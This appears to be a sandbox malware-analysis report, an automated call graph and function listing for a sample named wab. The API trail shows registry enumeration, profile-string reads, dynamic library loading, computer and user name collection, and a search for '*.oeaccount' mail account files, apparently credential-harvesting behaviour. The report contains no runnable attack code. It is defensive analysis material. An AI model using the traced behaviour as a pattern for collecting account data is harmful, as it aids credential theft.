33126->33127 33127->33126 33129 4097f3 33127->33129 33138 40937a memset GetPrivateProfileStringA WritePrivateProfileStringA _itoa 33127->33138 33129->32977 33130->33116 33132 40973e _mbscpy _mbscpy 33131->33132 33133 40930c 33132->33133 33134 44b090 33133->33134 33135 409319 memset GetPrivateProfileStringA 33134->33135 33136 409374 33135->33136 33137 409364 WritePrivateProfileStringA 33135->33137 33136->33124 33137->33136 33138->33127 33149 406f81 GetFileAttributesA 33139->33149 33141 409675 33142 4096ee 33141->33142 33143 40967a _mbscpy _mbscpy GetPrivateProfileIntA 33141->33143 33142->32978 33150 409278 GetPrivateProfileStringA 33143->33150 33145 4096c9 33151 409278 GetPrivateProfileStringA 33145->33151 33147 4096da 33152 409278 GetPrivateProfileStringA 33147->33152 33149->33141 33150->33145 33151->33147 33152->33142 33244 409c1c 33153->33244 33156 401e69 memset 33283 410dbb 33156->33283 33159 401ec2 33313 4070e3 strlen _mbscat _mbscpy _mbscat 33159->33313 33160 401ed4 33298 406f81 GetFileAttributesA 33160->33298 33163 401ee6 strlen strlen 33165 401f15 33163->33165 33166 401f28 33163->33166 33314 4070e3 strlen _mbscat _mbscpy _mbscat 33165->33314 33299 406f81 GetFileAttributesA 33166->33299 33169 401f35 33300 401c31 33169->33300 33172 401f75 33312 410a9c RegOpenKeyExA 33172->33312 33174 401c31 7 API calls 33174->33172 33175 401f91 33176 402187 33175->33176 33177 401f9c memset 33175->33177 33179 402195 ExpandEnvironmentStringsA 33176->33179 33180 4021a8 _strcmpi 33176->33180 33315 410b62 RegEnumKeyExA 33177->33315 33324 406f81 GetFileAttributesA 33179->33324 33180->33070 33180->33071 33182 40217e RegCloseKey 33182->33176 33183 401fd9 atoi 33184 401fef memset memset sprintf 33183->33184 33192 401fc9 33183->33192 33316 410b1e 33184->33316 33187 402165 33187->33182 33188 402076 memset memset strlen strlen 33188->33192 33189 4020dd strlen strlen 33189->33192 33190 4070e3 strlen _mbscat _mbscpy _mbscat 33190->33192 33191 406f81 GetFileAttributesA 33191->33192 33192->33182 33192->33183 33192->33187 33192->33188 33192->33189 33192->33190 33192->33191 33193 402167 _mbscpy 33192->33193 33323 410b62 RegEnumKeyExA 33192->33323 33193->33182 33195 40c422 33194->33195 33196 40c425 _mbscat _mbscpy _mbscpy 33194->33196 33195->33196 33197 40c49d 33196->33197 33198 40c512 33197->33198 33199 40c502 GetWindowPlacement 33197->33199 33200 40c538 33198->33200 33345 4017d2 GetSystemMetrics GetSystemMetrics SetWindowPos 33198->33345 33199->33198 33338 409b31 33200->33338 33204 40ba28 33205 40ba87 33204->33205 33209 40ba3c 33204->33209 33348 406c62 LoadCursorA SetCursor 33205->33348 33207 40ba8c 33349 404734 33207->33349 33357 403c16 33207->33357 33433 404785 33207->33433 33436 410a9c RegOpenKeyExA 33207->33436 33437 4107f1 33207->33437 33208 40ba43 _mbsicmp 33208->33209 33209->33205 33209->33208 33440 40b5e5 10 API calls 33209->33440 33210 40baa0 33211 407e30 _strcmpi 33210->33211 33212 40bab0 33211->33212 33213 40bafa SetCursor 33212->33213 33215 40baf1 qsort 33212->33215 33213->33077 33215->33213 33801 409ded SendMessageA ??2@YAPAXI ??3@YAXPAX 33221->33801 33223 40b00e 33224 40b016 33223->33224 33225 40b01f GetStdHandle 33223->33225 33802 406d1a CreateFileA 33224->33802 33227 40b01c 33225->33227 33228 40b035 33227->33228 33229 40b12d 33227->33229 33803 406c62 LoadCursorA SetCursor 33228->33803 33807 406d77 9 API calls 33229->33807 33232 40b136 33243 40c580 28 API calls 33232->33243 33233 40b087 33240 40b0a1 33233->33240 33805 40a699 12 API calls 33233->33805 33234 40b042 33234->33233 33234->33240 33804 40a57c strlen WriteFile 33234->33804 33237 40b0d6 33238 40b116 CloseHandle 33237->33238 33239 40b11f SetCursor 33237->33239 33238->33239 33239->33232 33240->33237 33806 406d77 9 API calls 33240->33806 33242->33071 33243->33075 33256 409a32 33244->33256 33247 409c80 memcpy memcpy 33252 409cda 33247->33252 33248 409d18 ??2@YAPAXI ??2@YAPAXI 33250 409d54 ??2@YAPAXI 33248->33250 33253 409d8b 33248->33253 33249 408db6 12 API calls 33249->33252 33250->33253 33252->33247 33252->33248 33252->33249 33253->33253 33266 409b9c 33253->33266 33255 4023c1 33255->33156 33257 409a44 33256->33257 33258 409a3d ??3@YAXPAX 33256->33258 33259 409a52 33257->33259 33260 409a4b ??3@YAXPAX 33257->33260 33258->33257 33261 409a63 33259->33261 33262 409a5c ??3@YAXPAX 33259->33262 33260->33259 33263 409a83 ??2@YAPAXI ??2@YAPAXI 33261->33263 33264 409a73 ??3@YAXPAX 33261->33264 33265 409a7c ??3@YAXPAX 33261->33265 33262->33261 33263->33247 33264->33265 33265->33263 33267 407a55 ??3@YAXPAX 33266->33267 33268 409ba5 33267->33268 33269 407a55 ??3@YAXPAX 33268->33269 33270 409bad 33269->33270 33271 407a55 ??3@YAXPAX 33270->33271 33272 409bb5 33271->33272 33273 407a55 ??3@YAXPAX 33272->33273 33274 409bbd 33273->33274 33275 407a1f 4 API calls 33274->33275 33276 409bd0 33275->33276 33277 407a1f 4 API calls 33276->33277 33278 409bda 33277->33278 33279 407a1f 4 API calls 33278->33279 33280 409be4 33279->33280 33281 407a1f 4 API calls 33280->33281 33282 409bee 33281->33282 33282->33255 33284 410d0e 2 API calls 33283->33284 33285 410dca 33284->33285 33286 410dfd memset 33285->33286 33325 4070ae 33285->33325 33287 410e1d 33286->33287 33328 410a9c RegOpenKeyExA 33287->33328 33291 401e9e strlen strlen 33291->33159 33291->33160 33292 410e4a 33293 410e7f _mbscpy 33292->33293 33329 410d3d _mbscpy 33292->33329 33293->33291 33295 410e5b 33330 410add RegQueryValueExA 33295->33330 33297 410e73 RegCloseKey 33297->33293 33298->33163 33299->33169 33331 410a9c RegOpenKeyExA 33300->33331 33302 401c4c 33303 401cad 33302->33303 33332 410add RegQueryValueExA 33302->33332 33303->33172 33303->33174 33305 401c6a 33306 401c71 strchr 33305->33306 33307 401ca4 RegCloseKey 33305->33307 33306->33307 33308 401c85 strchr 33306->33308 33307->33303 33308->33307 33309 401c94 33308->33309 33333 406f06 strlen 33309->33333 33311 401ca1 33311->33307 33312->33175 33313->33160 33314->33166 33315->33192 33336 410a9c RegOpenKeyExA 33316->33336 33318 410b34 33319 410b5d 33318->33319 33337 410add RegQueryValueExA 33318->33337 33319->33192 33321 410b4c RegCloseKey 33321->33319 33323->33192 33324->33180 33326 4070bd GetVersionExA 33325->33326 33327 4070ce 33325->33327 33326->33327 33327->33286 33327->33291 33328->33292 33329->33295 33330->33297 33331->33302 33332->33305 33334 406f17 33333->33334 33335 406f1a memcpy 33333->33335 33334->33335 33335->33311 33336->33318 33337->33321 33339 409b40 33338->33339 33341 409b4e 33338->33341 33346 409901 memset SendMessageA 33339->33346 33342 409b99 33341->33342 33343 409b8b 33341->33343 33342->33204 33347 409868 SendMessageA 33343->33347 33345->33200 33346->33341 33347->33342 33348->33207 33350 404785 FreeLibrary 33349->33350 33351 40473b LoadLibraryA 33350->33351 33352 40474c GetProcAddress 33351->33352 33353 40476e 33351->33353 33352->33353 33354 404764 33352->33354 33355 404781 33353->33355 33356 404785 FreeLibrary 33353->33356 33354->33353 33355->33210 33356->33355 33358 4107f1 FreeLibrary 33357->33358 33359 403c30 LoadLibraryA 33358->33359 33360 403c74 33359->33360 33361 403c44 GetProcAddress 33359->33361 33362 4107f1 FreeLibrary 33360->33362 33361->33360 33363 403c5e 33361->33363 33364 403c7b 33362->33364 33363->33360 33366 403c6b 33363->33366 33365 404734 3 API calls 33364->33365 33367 403c86 33365->33367 33366->33364 33441 4036e5 33367->33441 33370 4036e5 26 API calls 33371 403c9a 33370->33371 33372 4036e5 26 API calls 33371->33372 33373 403ca4 33372->33373 33374 4036e5 26 API calls 33373->33374 33375 403cae 33374->33375 33453 4085d2 33375->33453 33383 403ce5 33384 403cf7 33383->33384 33634 402bd1 39 API calls 33383->33634 33499 410a9c RegOpenKeyExA 33384->33499 33387 403d0a 33388 403d1c 33387->33388 33635 402bd1 39 API calls 33387->33635 33500 402c5d 33388->33500 33392 4070ae GetVersionExA 33393 403d31 33392->33393 33518 410a9c RegOpenKeyExA 33393->33518 33395 403d51 33396 403d61 33395->33396 33636 402b22 46 API calls 33395->33636 33519 410a9c RegOpenKeyExA 33396->33519 33399 403d87 33400 403d97 33399->33400 33637 402b22 46 API calls 33399->33637 33520 410a9c RegOpenKeyExA 33400->33520 33403 403dbd 33404 403dcd 33403->33404 33638 402b22 46 API calls 33403->33638 33521 410808 33404->33521 33408 404785 FreeLibrary 33409 403de8 33408->33409 33525 402fdb 33409->33525 33412 402fdb 34 API calls 33413 403e00 33412->33413 33541 4032b7 33413->33541 33422 403e3b 33424 403e73 33422->33424 33425 403e46 _mbscpy 33422->33425 33588 40fb00 33424->33588 33640 40f334 334 API calls 33425->33640 33434 4047a3 33433->33434 33435 404799 FreeLibrary 33433->33435 33434->33210 33435->33434 33436->33210 33438 410807 33437->33438 33439 4107fc FreeLibrary 33437->33439 33438->33210 33439->33438 33440->33209 33442 4037c5 33441->33442 33443 4036fb 33441->33443 33442->33370 33641 410863 UuidFromStringA UuidFromStringA memcpy 33443->33641 33445 40370e 33445->33442 33446 403716 strchr 33445->33446 33446->33442 33447 403730 33446->33447 33642 4021b6 memset 33447->33642 33449 40373f _mbscpy _mbscpy strlen 33450 4037a4 _mbscpy 33449->33450 33451 403789 sprintf 33449->33451 33643 4023e5 16 API calls 33450->33643 33451->33450 33454 4085e2 33453->33454 33644 4082cd 11 API calls 33454->33644 33458 408600 33459 403cba 33458->33459 33460 40860b memset 33458->33460 33471 40821d 33459->33471 33647 410b62 RegEnumKeyExA 33460->33647 33462 4086d2 RegCloseKey 33462->33459 33464 408637 33464->33462 33465 40865c memset 33464->33465 33648 410a9c RegOpenKeyExA 33464->33648 33651 410b62 RegEnumKeyExA 33464->33651 33649 410add RegQueryValueExA 33465->33649 33468 408694 33650 40848b 10 API calls 33468->33650 33470 4086ab RegCloseKey 33470->33464 33652 410a9c RegOpenKeyExA 33471->33652 33473 40823f 33474 403cc6 33473->33474 33475 408246 memset 33473->33475 33483 4086e0 33474->33483 33653 410b62 RegEnumKeyExA 33475->33653 33477 4082bf RegCloseKey 33477->33474 33479 40826f 33479->33477 33654 410a9c RegOpenKeyExA 33479->33654 33655 4080ed 11 API calls 33479->33655 33656 410b62 RegEnumKeyExA 33479->33656 33482 4082a2 RegCloseKey 33482->33479 33657 4045db 33483->33657 33485 4088ef 33665 404656 33485->33665 33489 408737 wcslen 33489->33485 33492 40876a 33489->33492 33490 40877a _wcsncoll 33490->33492 33492->33485 33492->33490 33493 404734 3 API calls 33492->33493 33494 404785 FreeLibrary 33492->33494 33495 408812 memset 33492->33495 33496 40883c memcpy wcschr 33492->33496 33497 4088c3 LocalFree 33492->33497 33668 40466b _mbscpy 33492->33668 33493->33492 33494->33492 33495->33492 33495->33496 33496->33492 33497->33492 33498 410a9c RegOpenKeyExA 33498->33383 33499->33387 33669 410a9c RegOpenKeyExA 33500->33669 33502 402c7a 33503 402da5 33502->33503 33504 402c87 memset 33502->33504 33503->33392 33670 410b62 RegEnumKeyExA 33504->33670 33506 402d9c RegCloseKey 33506->33503 33507 410b1e 3 API calls 33508 402ce4 memset sprintf 33507->33508 33671 410a9c RegOpenKeyExA 33508->33671 33510 402d28 33511 402d3a sprintf 33510->33511 33672 402bd1 39 API calls 33510->33672 33673 410a9c RegOpenKeyExA 33511->33673 33516 402cb2 33516->33506 33516->33507 33517 402d9a 33516->33517 33674 402bd1 39 API calls 33516->33674 33675 410b62 RegEnumKeyExA 33516->33675 33517->33506 33518->33395 33519->33399 33520->33403 33522 410816 33521->33522 33523 4107f1 FreeLibrary 33522->33523 33524 403ddd 33523->33524 33524->33408 33676 410a9c RegOpenKeyExA 33525->33676 33527 402ff9 33528 403006 memset 33527->33528 33529 40312c 33527->33529 33677 410b62 RegEnumKeyExA 33528->33677 33529->33412 33531 403033 33532 403122 RegCloseKey 33531->33532 33533 410b1e 3 API calls 33531->33533 33536 4030a2 memset 33531->33536 33538 410b62 RegEnumKeyExA 33531->33538 33539 4030f9 RegCloseKey 33531->33539 33680 402db3 26 API calls 33531->33680 33532->33529 33534 403058 memset sprintf 33533->33534 33678 410a9c RegOpenKeyExA 33534->33678 33679 410b62 RegEnumKeyExA 33536->33679 33538->33531 33539->33531 33542 4032d5 33541->33542 33543 4033a9 33541->33543 33681 4021b6 memset 33542->33681 33556 4034e4 memset memset 33543->33556 33545 4032e1 33682 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33545->33682 33547 4032ea 33548 4032f8 memset GetPrivateProfileSectionA 33547->33548 33683 4023e5 16 API calls 33547->33683 33548->33543 33553 40332f 33548->33553 33550 40339b strlen 33550->33543 33550->33553 33552 403350 strchr 33552->33553 33553->33543 33553->33550 33684 4021b6 memset 33553->33684 33685 403166 strlen GetPrivateProfileStringA strchr strlen memcpy 33553->33685 33686 4023e5 16 API calls 33553->33686 33557 410b1e 3 API calls 33556->33557 33558 40353f 33557->33558 33559 40357f 33558->33559 33560 403546 _mbscpy 33558->33560 33564 403985 33559->33564 33687 406d55 strlen _mbscat 33560->33687 33562 403565 _mbscat 33688 4033f0 19 API calls 33562->33688 33689 40466b _mbscpy 33564->33689 33568 4039aa 33570 4039ff 33568->33570 33690 40f460 memset memset 33568->33690 33711 40f6e2 33568->33711 33727 4038e8 21 API calls 33568->33727 33571 404785 FreeLibrary 33570->33571 33572 403a0b 33571->33572 33573 4037ca memset memset 33572->33573 33735 444551 memset 33573->33735 33576 4038e2 33576->33422 33639 40f334 334 API calls 33576->33639 33578 40382e 33579 406f06 2 API calls 33578->33579 33580 403843 33579->33580 33581 406f06 2 API calls 33580->33581 33582 403855 strchr 33581->33582 33583 403884 _mbscpy 33582->33583 33584 403897 strlen 33582->33584 33585 4038bf _mbscpy 33583->33585 33584->33585 33586 4038a4 sprintf 33584->33586 33747 4023e5 16 API calls 33585->33747 33586->33585 33589 44b090 33588->33589 33590 40fb10 RegOpenKeyExA 33589->33590 33591 403e7f 33590->33591 33592 40fb3b RegOpenKeyExA 33590->33592 33602 40f96c 33591->33602 33593 40fb55 RegQueryValueExA 33592->33593 33594 40fc2d RegCloseKey 33592->33594 33595 40fc23 RegCloseKey 33593->33595 33596 40fb84 33593->33596 33594->33591 33595->33594 33597 404734 3 API calls 33596->33597 33598 40fb91 33597->33598 33598->33595 33599 40fc19 LocalFree 33598->33599 33600 40fbdd memcpy memcpy 33598->33600 33599->33595 33752 40f802 11 API calls 33600->33752 33603 4070ae GetVersionExA 33602->33603 33604 40f98d 33603->33604 33605 4045db 7 API calls 33604->33605 33609 40f9a9 33605->33609 33606 40fae6 33607 404656 FreeLibrary 33606->33607 33608 403e85 33607->33608 33614 4442ea memset 33608->33614 33609->33606 33610 40fa13 memset WideCharToMultiByte 33609->33610 33610->33609 33611 40fa43 _strnicmp 33610->33611 33611->33609 33612 40fa5b WideCharToMultiByte 33611->33612 33612->33609 33613 40fa88 WideCharToMultiByte 33612->33613 33613->33609 33615 410dbb 9 API calls 33614->33615 33616 444329 33615->33616 33753 40759e strlen strlen 33616->33753 33621 410dbb 9 API calls 33622 444350 33621->33622 33623 40759e 3 API calls 33622->33623 33624 44435a 33623->33624 33625 444212 65 API calls 33624->33625 33626 444366 memset memset 33625->33626 33627 410b1e 3 API calls 33626->33627 33628 4443b9 ExpandEnvironmentStringsA strlen 33627->33628 33629 4443f4 _strcmpi 33628->33629 33630 4443e5 33628->33630 33631 403e91 33629->33631 33632 44440c 33629->33632 33630->33629 33631->33210 33633 444212 65 API calls 33632->33633 33633->33631 33634->33384 33635->33388 33636->33396 33637->33400 33638->33404 33639->33422 33640->33424 33641->33445 33642->33449 33643->33442 33645 40841c 33644->33645 33646 410a9c RegOpenKeyExA 33645->33646 33646->33458 33647->33464 33648->33464 33649->33468 33650->33470 33651->33464 33652->33473 33653->33479 33654->33479 33655->33482 33656->33479 33658 404656 FreeLibrary 33657->33658 33659 4045e3 LoadLibraryA 33658->33659 33660 404651 33659->33660 33661 4045f4 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 33659->33661 33660->33485 33660->33489 33662 40463d 33661->33662 33663 404656 FreeLibrary 33662->33663 33664 404643 33662->33664 33663->33660 33664->33660 33666 403cd2 33665->33666 33667 40465c FreeLibrary 33665->33667 33666->33498 33667->33666 33668->33492 33669->33502 33670->33516 33671->33510 33672->33511 33673->33516 33674->33516 33675->33516 33676->33527 33677->33531 33678->33531 33679->33531 33680->33531 33681->33545 33682->33547 33683->33548 33684->33552 33685->33553 33686->33553 33687->33562 33688->33559 33689->33568 33728 4078ba 33690->33728 33693 4078ba _mbsnbcat 33694 40f5a3 RegOpenKeyExA 33693->33694 33695 40f5c3 RegQueryValueExA 33694->33695 33696 40f6d9 33694->33696 33697 40f6d0 RegCloseKey 33695->33697 33698 40f5f0 33695->33698 33696->33568 33697->33696 33698->33697 33708 40f675 33698->33708 33732 40466b _mbscpy 33698->33732 33700 40f611 33702 404734 3 API calls 33700->33702 33707 40f616 33702->33707 33703 40f69e RegQueryValueExA 33703->33697 33704 40f6c1 33703->33704 33704->33697 33705 40f66a 33706 404785 FreeLibrary 33705->33706 33706->33708 33707->33705 33709 40f661 LocalFree 33707->33709 33710 40f645 memcpy 33707->33710 33708->33697 33733 4012ee strlen 33708->33733 33709->33705 33710->33709 33734 40466b _mbscpy 33711->33734 33713 40f6fa 33714 4045db 7 API calls 33713->33714 33715 40f708 33714->33715 33716 404734 3 API calls 33715->33716 33722 40f7e2 33715->33722 33718 40f715 33716->33718 33717 404656 FreeLibrary 33719 40f7f1 33717->33719 33718->33722 33723 40f797 WideCharToMultiByte 33718->33723 33720 404785 FreeLibrary 33719->33720 33721 40f7fc 33720->33721 33721->33568 33722->33717 33724 40f7b8 strlen 33723->33724 33725 40f7d9 LocalFree 33723->33725 33724->33725 33726 40f7c8 _mbscpy 33724->33726 33725->33722 33726->33725 33727->33568 33729 4078e6 33728->33729 33730 4078c7 _mbsnbcat 33729->33730 33731 4078ea 33729->33731 33730->33729 33731->33693 33732->33700 33733->33703 33734->33713 33748 410a9c RegOpenKeyExA 33735->33748 33737 40381a 33737->33576 33746 4021b6 memset 33737->33746 33738 44458b 33738->33737 33749 410add RegQueryValueExA 33738->33749 33740 4445a4 33741 4445dc RegCloseKey 33740->33741 33750 410add RegQueryValueExA 33740->33750 33741->33737 33743 4445c1 33743->33741 33751 444879 30 API calls 33743->33751 33745 4445da 33745->33741 33746->33578 33747->33576 33748->33738 33749->33740 33750->33743 33751->33745 33752->33599 33754 4075c9 33753->33754 33755 4075bb _mbscat 33753->33755 33756 444212 33754->33756 33755->33754 33773 407e9d 33756->33773 33759 44424d 33760 444274 33759->33760 33762 444258 33759->33762 33781 407ef8 33759->33781 33761 407e9d 9 API calls 33760->33761 33770 4442a0 33761->33770 33798 444196 52 API calls 33762->33798 33764 407ef8 9 API calls 33764->33770 33765 4442ce 33795 407f90 33765->33795 33769 407f90 FindClose 33771 4442e4 33769->33771 33770->33764 33770->33765 33772 444212 65 API calls 33770->33772 33791 407e62 33770->33791 33771->33621 33772->33770 33774 407f90 FindClose 33773->33774 33775 407eaa 33774->33775 33776 406f06 2 API calls 33775->33776 33777 407ebd strlen strlen 33776->33777 33778 407ee1 33777->33778 33780 407eea 33777->33780 33799 4070e3 strlen _mbscat _mbscpy _mbscat 33778->33799 33780->33759 33782 407f03 FindFirstFileA 33781->33782 33783 407f24 FindNextFileA 33781->33783 33784 407f3f 33782->33784 33785 407f46 strlen strlen 33783->33785 33786 407f3a 33783->33786 33784->33785 33788 407f7f 33784->33788 33785->33788 33789 407f76 33785->33789 33787 407f90 FindClose 33786->33787 33787->33784 33788->33759 33800 4070e3 strlen _mbscat _mbscpy _mbscat 33789->33800 33792 407e94 33791->33792 33793 407e6c strcmp 33791->33793 33792->33770 33793->33792 33794 407e83 strcmp 33793->33794 33794->33792 33796 407fa3 33795->33796 33797 407f99 FindClose 33795->33797 33796->33769 33797->33796 33798->33759 33799->33780 33800->33788 33801->33223 33802->33227 33803->33234 33804->33233 33805->33240 33806->33237 33807->33232 33816 411853 RtlInitializeCriticalSection memset 33817 401455 ExitProcess GetWindowLongA SetWindowLongA EnumChildWindows EnumChildWindows 33990 40a256 13 API calls 33992 432e5b 17 API calls 33994 43fa5a 20 API calls 33819 401060 41 API calls 33997 427260 CloseHandle memset memset 32916 410c68 FindResourceA 32917 410c81 SizeofResource 32916->32917 32920 410cae 32916->32920 32918 410c92 LoadResource 32917->32918 32917->32920 32919 410ca0 LockResource 32918->32919 32918->32920 32919->32920 33999 405e69 14 API calls 33824 433068 15 API calls __fprintf_l 34001 414a6d 18 API calls 34002 43fe6f 134 API calls 33826 424c6d 15 API calls __fprintf_l 34003 426741 19 API calls 33828 440c70 17 API calls 33829 443c71 44 API calls 33832 427c79 24 API calls 34006 416e7e memset __fprintf_l 33836 42800b 47 API calls 33837 425115 82 API calls __fprintf_l 34009 41960c 61 API calls 33838 43f40c 122 API calls __fprintf_l 33841 411814 InterlockedCompareExchange RtlDeleteCriticalSection 33842 43f81a 20 API calls 33844 414c20 memset memset 33845 410c22 memset _itoa WritePrivateProfileStringA GetPrivateProfileIntA 34013 414625 18 API calls 34014 404225 modf 34015 403a26 strlen WriteFile 34017 40422a 12 API calls 34021 427632 memset memset memcpy 34022 40ca30 59 API calls 32903 44b435 VirtualProtect 32904 44b444 VirtualProtect 32903->32904 32905 44b454 32903->32905 32904->32905 34023 404235 26 API calls 33847 425115 76 API calls __fprintf_l 34024 425115 77 API calls __fprintf_l 34026 44223a 38 API calls 33853 43183c 112 API calls 34027 44b2c5 _onexit __dllonexit 34032 42a6d2 memcpy __allrem 33855 405cda 65 API calls 34040 43fedc 138 API calls 34041 4116e1 16 API calls __fprintf_l 33858 4244e6 19 API calls 33860 42e8e8 127 API calls __fprintf_l 33861 4118ee RtlLeaveCriticalSection 34046 43f6ec 22 API calls 33863 425115 119 API calls __fprintf_l 32906 410cf3 EnumResourceNamesA 34049 4492f0 memcpy memcpy 34051 43fafa 18 API calls 34053 4342f9 15 API calls __fprintf_l 33864 4144fd 19 API calls 34055 4016fd NtdllDefWindowProc_A ??2@YAPAXI memset memcpy ??3@YAXPAX 34056 40b2fe LoadIconA LoadIconA SendMessageA SendMessageA SendMessageA 34059 443a84 _mbscpy 34061 43f681 17 API calls 33867 404487 22 API calls 34063 415e8c 16 API calls __fprintf_l 33871 411893 RtlDeleteCriticalSection __fprintf_l 33872 41a492 42 API calls 34067 403e96 34 API calls 34068 410e98 memset SHGetPathFromIDList SendMessageA 33874 426741 109 API calls __fprintf_l 33875 4344a2 18 API calls 33876 4094a2 10 API calls 34071 4116a6 15 API calls __fprintf_l 34072 43f6a4 17 API calls 34073 440aa3 20 API calls 34075 427430 45 API calls 33879 4090b0 7 API calls 33880 4148b0 15 API calls 33882 4118b4 RtlEnterCriticalSection 33883 4014b7 CreateWindowExA 33884 40c8b8 19 API calls 33886 4118bf RtlTryEnterCriticalSection 34080 42434a 18 API calls __fprintf_l 34082 405f53 12 API calls 33894 43f956 59 API calls 33896 40955a 17 API calls 33897 428561 36 API calls 33898 409164 7 API calls 34086 404366 19 API calls 34090 40176c ExitProcess 34093 410777 42 API calls 33903 40dd7b 51 API calls 33904 425d7c 16 API calls __fprintf_l 34095 43f6f0 25 API calls 34096 42db01 22 API calls 33905 412905 15 API calls __fprintf_l 34097 403b04 54 API calls 34098 405f04 SetDlgItemTextA GetDlgItemTextA 34099 44b301 ??3@YAXPAX 34102 4120ea 14 API calls 3 library calls 34103 40bb0a 8 API calls 34105 413f11 strcmp 33909 434110 17 API calls __fprintf_l 33911 425115 108 API calls __fprintf_l 34106 444b11 _onexit 33913 425115 76 API calls __fprintf_l 33916 429d19 10 API calls 34109 444b1f __dllonexit 34110 409f20 _strcmpi 33918 42b927 31 API calls 34113 433f26 19 API calls __fprintf_l 34114 44b323 FreeLibrary 34115 427f25 46 API calls 34116 43ff2b 17 API calls 34117 43fb30 19 API calls 33925 414d36 16 API calls 33927 40ad38 7 API calls 34119 433b38 16 API calls __fprintf_l 34120 44b33b ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 33931 426741 21 API calls 33932 40c5c3 125 API calls 33934 43fdc5 17 API calls 34121 4117c8 InterlockedCompareExchange RtlInitializeCriticalSection 33937 4161cb memcpy memcpy memcpy memcpy 34126 43ffc8 18 API calls 33938 4281cc 15 API calls __fprintf_l 34128 4383cc 110 API calls __fprintf_l 33939 4275d3 41 API calls 34129 4153d3 22 API calls __fprintf_l 33940 444dd7 _XcptFilter 34134 4013de 15 API calls 34136 425115 111 API calls __fprintf_l 34137 43f7db 18 API calls 34140 410be6 WritePrivateProfileStringA GetPrivateProfileStringA 33943 4335ee 16 API calls __fprintf_l 34142 429fef 11 API calls 33944 444deb _exit _c_exit 34143 40bbf0 138 API calls 33947 425115 79 API calls __fprintf_l 34147 437ffa 22 API calls 33951 4021ff 14 API calls 33952 43f5fc 149 API calls 34148 40e381 9 API calls 33954 405983 40 API calls 33955 42b186 27 API calls __fprintf_l 33956 427d86 76 API calls 33957 403585 20 API calls 33959 42e58e 18 API calls __fprintf_l 33962 425115 75 API calls __fprintf_l 33964 401592 8 API calls 32907 410b92 32910 410a6b 32907->32910 32909 410bb2 32911 410a77 32910->32911 32912 410a89 GetPrivateProfileIntA 32910->32912 32915 410983 memset _itoa WritePrivateProfileStringA 32911->32915 32912->32909 32914 410a84 32914->32909 32915->32914 34152 434395 16 API calls 33966 441d9c memcmp 34154 43f79b 119 API calls 33967 40c599 43 API calls 34155 426741 87 API calls 33971 4401a6 21 API calls 33973 426da6 memcpy memset memset memcpy 33974 4335a5 15 API calls 33976 4299ab memset memset memcpy memset memset 33977 40b1ab 8 API calls 34160 425115 76 API calls __fprintf_l 34164 4113b2 18 API calls 2 library calls 34168 40a3b8 memset sprintf SendMessageA 32921 410bbc 32924 4109cf 32921->32924 32925 4109dc 32924->32925 32926 410a23 memset GetPrivateProfileStringA 32925->32926 32927 4109ea memset 32925->32927 32932 407646 strlen 32926->32932 32937 4075cd sprintf memcpy 32927->32937 32930 410a0c WritePrivateProfileStringA 32931 410a65 32930->32931 32933 40765a 32932->32933 32935 40765c 32932->32935 32933->32931 32934 4076a3 32934->32931 32935->32934 32938 40737c strtoul 32935->32938 32937->32930 32938->32935 33979 40b5bf memset memset _mbsicmp

                                                              Executed Functions

                                                              Function 004082CD Relevance: 31.6, APIs: 11, Strings: 7, Instructions: 145stringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 129 4082cd-40841a memset * 4 GetComputerNameA GetUserNameA MultiByteToWideChar * 2 strlen * 2 memcpy 130 408450-408453 129->130 131 40841c 129->131 133 408484-408488 130->133 134 408455-40845e 130->134 132 408422-40842b 131->132 135 408432-40844e 132->135 136 40842d-408431 132->136 137 408460-408464 134->137 138 408465-408482 134->138 135->130 135->132 136->135 137->138 138->133 138->134
                                                              APIs
                                                              • memset.MSVCRT ref: 0040832F
                                                              • memset.MSVCRT ref: 00408343
                                                              • memset.MSVCRT ref: 0040835F
                                                              • memset.MSVCRT ref: 00408376
                                                              • GetComputerNameA.KERNEL32(?,?), ref: 00408398
                                                              • GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                                                              • strlen.MSVCRT ref: 004083E9
                                                              • strlen.MSVCRT ref: 004083F8
                                                              • memcpy.MSVCRT ref: 0040840A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                                                              • String ID: 5$H$O$b$i$}$}
                                                              • API String ID: 1832431107-3760989150
                                                              • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                              • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                                                              • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                                                              • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                                                              Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 443 407ef8-407f01 444 407f03-407f22 FindFirstFileA 443->444 445 407f24-407f38 FindNextFileA 443->445 446 407f3f-407f44 444->446 447 407f46-407f74 strlen * 2 445->447 448 407f3a call 407f90 445->448 446->447 450 407f89-407f8f 446->450 451 407f83 447->451 452 407f76-407f81 call 4070e3 447->452 448->446 454 407f86-407f88 451->454 452->454 454->450
                                                              APIs
                                                              • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                                                              • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                                                              • strlen.MSVCRT ref: 00407F5C
